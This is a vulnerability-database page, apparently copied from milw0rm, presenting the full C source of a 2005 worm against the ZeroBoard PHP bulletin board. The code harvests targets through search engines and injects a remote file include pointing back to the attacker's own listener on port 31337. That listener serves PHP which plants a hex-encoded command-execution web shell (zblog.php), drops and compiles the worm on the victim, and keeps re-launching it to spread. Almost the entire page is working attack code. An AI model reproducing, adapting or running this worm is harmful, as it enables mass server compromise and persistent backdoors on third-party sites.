ZeroBoard – Worm Source Code
漏洞ID | 1055093 | 漏洞类型 | |
发布时间 | 2005-05-06 | 更新时间 | 2005-05-06 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
The worm exploits a vulnerability in ZeroBoard, allowing an attacker to inject arbitrary PHP code.
/str0ke
*/
/*
** ZeroBoard -1day INE w0rm
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <net/if.h>
#ifdef __sun__
#include <sys/sockio.h>
#endif /* __SunOS__ */
#define DEBUG_ING
#undef DEBUG_ING
#define TMP_FILE "./tmp.core"
#define CMD_FILE "./cmd.core"
#define PRC_FILE "./proc.core"
#define SCS (0)
#define MIN (1)
#ifdef __linux__
#define DEF_ETH "eth0"
#else
#ifdef __FreeBSD__
#define DEF_ETH "ed0"
#else
#ifdef __sun__
#define DEF_ETH "hme0"
#endif
#endif
#endif
#define MAX_BUF (0x0000ffff)
#define FIR_BUF (0x00000800)
#define SEC_BUF (0x00000400)
#define THR_BUF (0x00000200)
#define MIN_BUF (0x00000100)
#define VENDOR "nzeo.com"
// search rule
#define FD_RULE_0 "/zboard/zboard.php"
#define FD_RULE_1 "/zb41/zboard.php"
#define FD_RULE_2 "/bbs/zboard.php"
#define FD_RULE_3 "/zb/zboard.php"
#define FD_RULE_4 "/zb40/zboard.php"
#define FD_RULE_5 "/board/zboard.php"
#define FD_RULE_6 "zboard.php"
#define FD_RULE_7 "zboard.ph"
// pattern
#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
#define FD_PATH_3 "/zb/skin/zero_vote/login.php"
#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
#define FD_PATH_5 "/board/skin/zero_vote/login.php"
#define FD_PATH_6 "/skin/zero_vote/login.php"
#define RESULT_OK "200 OK"
#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
#define MAKE_STR2 "ZBCODE MAKE SUCCESS"
#define DELT_STR1 "BACKDOOR DELETE SUCCESS"
#define DELT_STR2 "ZBCODE DELETE SUCCESS"
#define DEF_PORT (31337)
#define CONN_PORT (80)
#define DEF_TIME (20)
int set_sock(char *sc_gt_host,int port,int type);
void re_connt_lm(int st_sock_va,int type);
int proc_r();
void t_kill();
void sf_exit();
int g_ip(char *ip);
int make_cmd_file();
int filter_f(char *test_bf,int tnum);
int sock;
struct tg_rl
{
int r_num;
char *r_str;
char *url_str;
};
#define TARGET_NUM (7)
#define SEARCH_NUM (4)
struct tg_rl __tg_rule_va[]=
{
{0,FD_RULE_0,FD_PATH_0},
{1,FD_RULE_1,FD_PATH_1},
{2,FD_RULE_2,FD_PATH_2},
{3,FD_RULE_3,FD_PATH_3},
{4,FD_RULE_4,FD_PATH_4},
{5,FD_RULE_5,FD_PATH_5},
{6,FD_RULE_6,FD_PATH_6},
{7,FD_RULE_7,FD_PATH_6},
{8,NULL,NULL}
};
struct search_rule
{
int num;
u_char *url;
int maxnum;
int defnum;
u_char *http_head;
};
struct search_rule search_va[]=
{
{0,"www.google.com",990,10,"http://"},
{1,"kr.search.yahoo.com",990,15,"http://"},
{2,"search.nate.com",480,10,"http://"},
{3,"search.lycos.com",990,10,"//"},
{4,"kr.altavista.com",1000,10,"//"},
{5,NULL,0,0,NULL}
};
void t_kill()
{
#ifdef DEBUG_ING
fprintf(stdout,"time outn");
#endif
close(sock);
sock=-1;
signal(SIGALRM,SIG_DFL);
return;
}
void sf_exit()
{
#ifdef DEBUG_ING
fprintf(stdout,"safe exitn");
#endif
close(sock);
kill((int)proc_r(),9);
unlink(TMP_FILE);
unlink(CMD_FILE);
unlink(PRC_FILE);
exit(-1);
}
int main(int argc,char *argv[])
{
FILE *fp;
int tnum=(SCS);
int chk=(SCS);
int gogo=(SCS);
int whgl=(SCS);
int qnum=(SCS);
int tgrl_sl=(MIN);
int _conn_num=(SCS);
int port=(CONN_PORT);
int def_port=(DEF_PORT);
int sc_gt_sock;
int host_chk=(SCS);
u_char *gg_ptr=NULL;
u_char *t_ptr=NULL;
u_char __zr_bf[(MAX_BUF)];
u_char *port_ptr=NULL;
char pkt[(FIR_BUF)];
char host[(SEC_BUF)];
char url[(SEC_BUF)];
char test_bf[(MAX_BUF)];
char req_t_bf[(THR_BUF)];
char ip[(MIN_BUF)];
char atk_code[(MIN_BUF)];
signal(SIGINT,sf_exit);
signal(SIGTSTP,sf_exit);
while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'S':
case 's':
tnum=atoi(optarg);
if(SEARCH_NUM<tnum)
{
fprintf(stderr,"target errorn");
exit(-1);
}
break;
case 'T':
case 't':
tgrl_sl=atoi(optarg);
if(TARGET_NUM<tgrl_sl)
{
fprintf(stderr,"target errorn");
exit(-1);
}
break;
case 'Q':
case 'q':
qnum=atoi(optarg);
break;
case 'P':
case 'p':
def_port=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
host_chk++;
break;
case 'U':
case 'u':
memset((char *)url,0,sizeof(url));
strncpy(url,optarg,sizeof(url)-1);
host_chk++;
break;
default:
exit(-1);
}
}
(int)make_cmd_file();
if(fork()==0)
{
signal(SIGALRM,SIG_IGN);
for(whgl=0;whgl<argc;whgl++)
{
memset((char *)argv[whgl],0,strlen(argv[whgl]));
}
strcpy(argv[0],"receive mode process");
if((fp=fopen(PRC_FILE,"w"))==NULL)
{
sf_exit();
}
fprintf(fp,"%dn",getpid());
fclose(fp);
sc_gt_sock=(int)set_sock(NULL,def_port,1);
(void)re_connt_lm(sc_gt_sock,0);
}
else
{
for(whgl=0;whgl<argc;whgl++)
{
memset((char *)argv[whgl],0,strlen(argv[whgl]));
}
strcpy(argv[0],"scanning mode process");
switch(host_chk)
{
case 1:
#ifdef DEBUG_ING
fprintf(stdout,"argument errorn");
#endif
sf_exit();
break;
case 2:
goto ok;
break;
}
#ifdef DEBUG_ING
fprintf(stdout,"search url: %sn",search_va[tnum].url);
#endif
for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
{
conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
{
goto conn;
}
memset((char *)req_t_bf,0,sizeof(req_t_bf));
switch(search_va[tnum].num)
{
case 0:
snprintf(req_t_bf,sizeof(req_t_bf)-1,
"GET /search?q=%s"
"&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
"HTTP/1.0rnrn",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
break;
case 1:
snprintf(req_t_bf,sizeof(req_t_bf)-1,
"GET /search/web?p=%s&b=%d "
"HTTP/1.0rnrn",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
break;
case 2:
snprintf(req_t_bf,sizeof(req_t_bf)-1,
"GET /webpage/search.asp?query=%s&start=%d "
"HTTP/1.0rnrn",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
break;
case 3:
snprintf(req_t_bf,sizeof(req_t_bf)-1,
"GET /default.asp?query=%s&first=%d&pmore=more "
"HTTP/1.0rn"
"Accept-Language: korn"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)rn"
"Host: %srnrn",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
break;
case 4:
snprintf(req_t_bf,sizeof(req_t_bf)-1,
"GET /web/results?itag=wrx&q=%s&stq=%d "
"HTTP/1.0rn"
"Accept-Language: korn"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)rn"
"Host: %srnrn",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
break;
}
send(sock,req_t_bf,strlen(req_t_bf),0);
whgl=(SCS);
if((fp=fopen(TMP_FILE,"w"))==NULL)
{
return(-1);
}
signal(SIGALRM,SIG_IGN);
alarm(MAX_BUF);
memset((char *)test_bf,0,sizeof(test_bf));
while(recv(sock,test_bf,sizeof(test_bf)-1,0))
{
fprintf(fp,"%s",test_bf);
memset((char *)test_bf,0,sizeof(test_bf));
}
fclose(fp);
close(sock);
if((fp=fopen(TMP_FILE,"r"))==NULL)
{
return(-1);
}
while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
{
gg_ptr=__zr_bf;
while(MIN)
{
t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
if(t_ptr!=NULL)
{
memset((char *)test_bf,0,sizeof(test_bf));
whgl=(SCS);
chk=(SCS);
for(gogo=0;gogo<strlen(t_ptr);gogo++)
{
if(chk)
{
if(t_ptr[gogo]=='>')
chk=0;
}
else {
if(t_ptr[gogo]==' ')
continue;
else if(t_ptr[gogo]=='<')
chk=1;
else test_bf[whgl++]=t_ptr[gogo];
}
}
if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
continue;
else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);
if(t_ptr!=NULL)
t_ptr[0]=' ';
else continue;
if(filter_f(test_bf,tnum))
{
t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
if(strstr(t_ptr,search_va[tnum].http_head))
continue;
memset((char *)host,0,sizeof(host));
memset((char *)url,0,sizeof(url));
chk=(SCS);
if(strstr(test_bf,search_va[tnum].http_head))
{
t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
port=(CONN_PORT);
for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
{
if(t_ptr[whgl]=='/')
{
for(gogo=0;whgl<strlen(t_ptr);whgl++)
url[gogo++]=t_ptr[whgl];
strcat(url,__tg_rule_va[tgrl_sl].url_str);
break;
}
else if(t_ptr[whgl]==' ')
{
strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
break;
}
else if(t_ptr[whgl]==':')
{
port_ptr=(char *)strstr(t_ptr,":")+1;
port=atoi(port_ptr);
}
else host[chk++]=t_ptr[whgl];
}
#ifdef DEBUG_ING
fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%dn",test_bf,url,host,port);
#endif
ok:
sock=set_sock(host,port,0);
if(sock==-1)
continue;
else {
memset((char *)ip,0,sizeof(ip));
memset((char *)atk_code,0,sizeof(atk_code));
memset((char *)pkt,0,sizeof(pkt));
(int)g_ip(ip);
snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/rn",ip,def_port);
snprintf(pkt,sizeof(pkt)-1,
"POST http://%s%s HTTP/1.0rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Content-Length: %drn"
"Host: %srnrn%srn",host,url,strlen(atk_code),host,atk_code);
send(sock,pkt,strlen(pkt),0);
memset((char *)pkt,0,sizeof(pkt));
recv(sock,pkt,sizeof(pkt)-1,0);
#ifdef DEBUG_ING
if(strstr(pkt,RESULT_OK))
{
if(strstr(pkt,MAKE_STR1))
fprintf(stdout,"%sn",MAKE_STR1);
if(strstr(pkt,MAKE_STR2))
fprintf(stdout,"%sn",MAKE_STR2);
if(strstr(pkt,DELT_STR1))
fprintf(stdout,"%sn",DELT_STR1);
if(strstr(pkt,DELT_STR2))
fprintf(stdout,"%sn",DELT_STR2);
printf("%s: %sn",RESULT_OK,host);
}
#endif
}
close(sock);
if(host_chk)
{
sf_exit();
}
}
}
}
else break;
}
memset((char *)__zr_bf,0,sizeof(__zr_bf));
}
fclose(fp);
unlink(TMP_FILE);
}
sf_exit();
}
}
int set_sock(char *sc_gt_host,int port,int type)
{
struct sockaddr_in sock_st;
struct sockaddr_in t_st;
int nw_gt_sock,s_s;
struct hostent *hst_etr;
int sc_gt_sock;
int t_c=0;
char t_b[(SEC_BUF)];
FILE *fp;
char http_rq[]="HTTP/1.1 200 OKrnrn";
if(!type){
signal(SIGALRM,t_kill);
alarm(DEF_TIME);
if((hst_etr=gethostbyname(sc_gt_host))==NULL)
{
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}
sock_st.sin_family=(AF_INET);
sock_st.sin_port=htons(port);
sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr);
memset(&(sock_st.sin_zero),0,8);
if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
{
close(sock);
return(-1);
}
return(sock);
}
else{
if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}
sock_st.sin_family=(AF_INET);
sock_st.sin_port=htons(port);
sock_st.sin_addr.s_addr=(INADDR_ANY);
memset(&(sock_st.sin_zero),0,8);
if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
{
close(sc_gt_sock);
return(-1);
}
#define BK_LG 10
if(listen(sc_gt_sock,(BK_LG))==-1){
close(sc_gt_sock);
return(-1);
}
while(1){
s_s=sizeof(struct sockaddr_in);
if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
{
close(nw_gt_sock);
close(sc_gt_sock);
return(-1);
}
while(recv(nw_gt_sock,&t_c,1,0)){
if(t_c==0x0d){
recv(nw_gt_sock,&t_c,1,0);
if(t_c==0x0a){
recv(nw_gt_sock,&t_c,1,0);
if(t_c==0x0d){
recv(nw_gt_sock,&t_c,1,0);
if(t_c==0x0a){
break;
}
}
}
}
}
send(nw_gt_sock,http_rq,strlen(http_rq),0);
if((fp=fopen(CMD_FILE,"r"))==NULL){
close(nw_gt_sock);
close(sc_gt_sock);
return(-1);
}
memset((char *)t_b,0,sizeof(t_b));
while(fgets(t_b,sizeof(t_b)-1,fp)){
send(nw_gt_sock,t_b,strlen(t_b),0);
}
fclose(fp);
close(nw_gt_sock);
continue;
}
close(sc_gt_sock);
return(-1);
}
}
void re_connt_lm(int st_sock_va,int type)
{
if(st_sock_va==-1)
{
if(!type){
kill(getppid(),9); // parent
}
kill((int)proc_r(),9); // child
sf_exit();
}
}
int proc_r(){
FILE *fp;
int proc_n;
if((fp=fopen(PRC_FILE,"r"))==NULL){
exit(-1); // child check.
}
fscanf(fp,"%16d",&proc_n);
fclose(fp);
return proc_n;
}
int g_ip(char *ip)
{
int sock;
struct ifreq ifpq;
struct sockaddr_in *pq;
memset(&ifpq,0,sizeof(ifpq));
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
return(-1);
}
pq=(struct sockaddr_in *)&ifpq.ifr_addr;
pq->sin_family=AF_INET;
memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
{
memset((char *)ip,0,(MIN_BUF));
snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
}
return 0;
}
#define BACKDOOR_PATH "zblog.php"
#define CODE_PATH "zbcode"
#define CODE_PATH_SRC "zbcode.c"
int make_cmd_file()
{
unsigned long w1=0;
FILE *fp;
FILE *pf;
if((fp=fopen(CMD_FILE,"w"))==NULL)
{
return(-1);
}
fprintf(fp,"<?n"
"chdir('../../');nn"
"if(($fp=fopen('%s','r'))!=NULL)n"
"{n"
"$pnum=fread($fp,32);n"
"fclose($fp);n"
"$pnum=str_replace("\n","",$pnum);n"
"if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)n"
"{n"
"exit;n"
"}n"
"}nn"
"$cont="\x3c\x3f\x0a\x09\x65\x63\x68\x6f\x20\x27\x3c\x46".n"
""\x4f\x52\x4d\x20\x41\x43\x54\x49\x4f\x4e\x3d\x24".n"
""\x50\x48\x50\x5f\x53\x45\x4c\x46\x20\x4d\x45\x54".n"
""\x48\x4f\x44\x3d\x50\x4f\x53\x54\x3e\x27\x3b\x0a".n"
""\x09\x65\x63\x68\x6f\x20\x27\x3c\x49\x4e\x50\x55".n"
""\x54\x20\x54\x59\x50\x45\x3d\x48\x49\x44\x44\x45".n"
""\x4e\x20\x4e\x41\x4d\x45\x3d\x63\x6d\x64\x20\x56".n"
""\x41\x4c\x55\x45\x3d\x24\x63\x6f\x6d\x6d\x61\x6e".n"
""\x64\x3e\x3c\x2f\x46\x4f\x52\x4d\x3e\x3c\x50\x52".n"
""\x45\x3e\x27\x3b\x0a\x09\x24\x63\x6f\x6d\x6d\x61".n"
""\x6e\x64\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61".n"
""\x63\x65\x28\x27\x5c\x5c\x27\x2c\x27\x27\x2c\x24".n"
""\x63\x6f\x6d\x6d\x61\x6e\x64\x29\x3b\x0a\x09\x65".n"
""\x63\x68\x6f\x20\x60\x24\x63\x6f\x6d\x6d\x61\x6e".n"
""\x64\x60\x3b\x0a\x3f\x3e\x0a";nn"
"$fp=fopen('%s','w');n"
"fputs($fp,$cont);n"
"fclose($fp);nn",PRC_FILE,BACKDOOR_PATH);
if((pf=fopen(CODE_PATH,"r"))==NULL)
{
return(-1);
}
fprintf(fp,"$cont="");
while(fread(&w1,1,1,pf))
{
fprintf(fp,"\x%02x",w1);
}
fclose(pf);
fprintf(fp,"";nn");
fprintf(fp,"$fp=fopen('%s','w');n"
"fputs($fp,$cont);n"
"fclose($fp);nn",CODE_PATH);
if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
{
return(-1);
}
fprintf(fp,"$cont="");
while(fread(&w1,1,1,pf))
{
fprintf(fp,"\x%02x",w1);
}
fclose(pf);
fprintf(fp,"";nn");
fprintf(fp,"$fp=fopen('%s','w');n"
"fputs($fp,$cont);n"
"fclose($fp);nn",CODE_PATH_SRC);
fprintf(fp,"$RES=`gcc -o %s %s`;nn",CODE_PATH,CODE_PATH_SRC);
fprintf(fp,"chmod('%s',0755);n",CODE_PATH);
fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){n",BACKDOOR_PATH);
fprintf(fp,"echo "%s\n";n",MAKE_STR1);
fprintf(fp,"} fclose($fp);nn");
fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){n",CODE_PATH);
fprintf(fp,"echo "%s\n";n",MAKE_STR2);
fprintf(fp,"} fclose($fp);nn");
#if 1
fprintf(fp,"$fnum=(rand()%%%d);n",TARGET_NUM);
fprintf(fp,"$snum=(rand()%%%d);n",SEARCH_NUM);
fprintf(fp,"$randnum=(rand()%400);n");
fprintf(fp,"while(1)n{n");
fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)n"
"{n"
"$pnum=fread($fp,32);n"
"fclose($fp);n"
"$pnum=str_replace("\n","",$pnum);n"
"if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)n"
"{n"
"exit;n"
"}n"
"}nn",PRC_FILE);
fprintf(fp,"$port=(rand()%%65500);n");
fprintf(fp,"if($port>1024){n");
fprintf(fp,"exec("./%s -t $fnum -p $port -s $snum -q $randnum");n",CODE_PATH);
fprintf(fp,"}n}n");
#else
fprintf(fp,"unlink('%s');n",BACKDOOR_PATH);
fprintf(fp,"unlink('%s');n",CODE_PATH);
fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){n",BACKDOOR_PATH);
fprintf(fp,"echo "%s\n";n",DELT_STR1);
fprintf(fp,"} else { fclose($fp);n");
fprintf(fp,"$result=`rm -f %s`;n$result=`del %s`;n",BACKDOOR_PATH,BACKDOOR_PATH);
fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){n",BACKDOOR_PATH);
fprintf(fp,"echo "%s\n";n",DELT_STR1);
fprintf(fp,"}n}n");
fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){n",CODE_PATH);
fprintf(fp,"echo "%s\n";n",DELT_STR2);
fprintf(fp,"} else { fclose($fp);n");
fprintf(fp,"$result=`rm -f %s`;n$result=`del %s`;n",CODE_PATH,CODE_PATH);
fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){n",CODE_PATH);
fprintf(fp,"echo "%s\n";n",DELT_STR2);
fprintf(fp,"}n}n");
#endif
fprintf(fp,"?>n");
fclose(fp);
}
int filter_f(char *test_bf,int tnum)
{
switch(search_va[tnum].num)
{
case 0: /* google */
if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
&&!strstr(test_bf,"<")&&!strstr(test_bf,">")
&&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
&&!strstr(test_bf,VENDOR))
{
return 1;
}
else return 0;
break;
case 1: /* yahoo */
if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
&&!strstr(test_bf,"<")&&!strstr(test_bf,">")
&&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
&&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
{
return 1;
}
else return 0;
break;
case 2: /* nate */
if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
&&!strstr(test_bf,"<")&&!strstr(test_bf,">")
&&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
&&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
{
return 1;
}
else return 0;
break;
case 3: /* lycos */
if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
&&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
&&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
{
return 1;
}
else return 0;
break;
case 4: /* altavista */
if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
&&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
&&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
{
return 1;
}
else return 0;
break;
default:
return 0;
break;
}
return 0;
}
// milw0rm.com [2005-05-06]
相关推荐: Secure Locate (slocate)漏洞
Secure Locate (slocate)漏洞 漏洞ID 1106111 漏洞类型 未知 发布时间 2000-12-02 更新时间 2005-05-02 CVE编号 CVE-2001-0066 CNNVD-ID CNNVD-200102-084 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666